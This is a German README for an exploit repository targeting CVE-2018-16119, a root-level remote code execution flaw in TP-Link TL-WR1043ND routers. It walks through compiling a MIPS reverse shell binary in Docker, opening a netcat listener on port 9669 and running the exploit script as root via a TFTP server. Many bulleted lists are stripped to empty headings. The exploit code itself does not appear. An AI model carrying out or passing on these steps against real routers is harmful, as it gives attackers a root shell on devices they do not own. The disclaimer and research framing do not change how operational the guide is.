
TP-Link TL-WR1043ND – Authentifizierte Remote-Codeausführung
CVE-2018-16119 ist eine kritische Schwachstelle für authentifizierte Remotecodeausführung, die TP-Link TL-WR1043ND Router betrifft. Diese Schwachstelle ermöglicht es authentifizierten Angreifern, beliebige Befehle auf dem Zielgerät mit Root-Rechten auszuführen, was potenziell zu einer vollständigen Kompromittierung des Systems führt.
CVE-Details: CVE-2018-16119
Nach der Ausnutzung erhält ein Angreifer Root-Shell-Zugriff auf den Router, was ihm ermöglicht:
# Install required packages
sudo apt-get update
sudo apt-get install netcat docker.io
Der Exploit erfordert eine MIPS-Big-Endian-Reverse-Shell-Binärdatei. Befolgen Sie diese Schritte, um sie zu kompilieren:
# Copy the source code to /tmp
cp exploit/tftp_server/reverse_shell_mipsbe.c /tmp/
# Use Docker container with MIPS cross-compilation tools
docker run -v /tmp/:/tmp/ -it asmimproved/qemu-mips /bin/bash
Innerhalb des Docker-Containers:
cd /tmp
mips-linux-gnu-gcc -static reverse_shell_mipsbe.c -o shh
Docker beenden und die kompilierte Binärdatei kopieren:
cp /tmp/shh exploit/tftp_server/
Öffnen Sie ein Terminal und starten Sie einen Netcat-Listener auf Port 9669:
Linux:
nc -l -p 9669 -vv
macOS:
nc -l 9669 -vv
Führen Sie das Exploit-Skript mit Root-Rechten aus (erforderlich für TFTP-Server):
sudo python3 exploit/exploit.py
Das Skript wird:
Sobald die Verbindung hergestellt ist:
CVE-2018-16119/
├── exploit/
│ ├── exploit.py # Main exploit script
│ ├── requirements.txt # Python dependencies
│ ├── notes.txt # Additional notes
│ └── tftp_server/
│ ├── reverse_shell_mipsbe.c # Reverse shell source code
│ └── shh # Compiled MIPS binary
├── firmware/
│ └── wr740nv4_webrevert.bin # Sample firmware
├── squashfs-root/ # Extracted firmware filesystem
└── README.md # This file
Diese Schwachstelle wurde verantwortungsvoll offengelegt und sollte nur verwendet werden für:
⚠️ WARNUNG: Dieser Exploit wird ausschließlich zu Bildungs- und autorisierten Testzwecken bereitgestellt. Der unbefugte Zugriff auf Computersysteme ist illegal und unethisch. Die Benutzer sind dafür verantwortlich, sicherzustellen, dass sie vor der Verwendung dieses Tools die entsprechende Autorisierung besitzen.
Python-Abhängigkeiten installieren:
pip3 install -r exploit/requirements.txt
TFTP-Server-Zugriff verweigert:
Verbindung fehlgeschlagen:
Keine Shell-Antwort:
id oder pwd einzugebenDiese Forschung zeigt kritische Sicherheitsmängel in der Firmware eingebetteter Geräte auf. Die Schwachstelle unterstreicht die Bedeutung von:
Forschung von: Alejandro Parodi
Twitter: @hdbreaker
LinkedIn: Alejandro Parodi
Diese Forschung wurde zu Bildungszwecken und zur Verbesserung der Sicherheit eingebetteter Systeme durchgeführt. Bitte verwenden Sie es verantwortungsvoll.